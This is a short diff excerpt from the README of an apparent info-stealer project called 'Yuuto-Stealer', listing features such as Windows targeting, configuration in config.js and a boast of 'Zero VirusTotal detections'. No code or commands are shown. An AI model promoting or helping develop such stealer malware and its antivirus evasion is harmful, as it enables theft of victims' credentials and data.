JustYuuto/Yuuto-Stealer/README.md

 ## Functionalities

 Some of these functionalities are customisable in the [`config.js`](config.js) file.
 You can find more details in [the wiki](https://github.com/JustYuuto/Grabber/wiki/Functionalities).
-Items in bold are functionalities you can get hyped with!

 * Made for Windows, but might work on macOS and Linux with Wine
 * Zero VirusTotal detections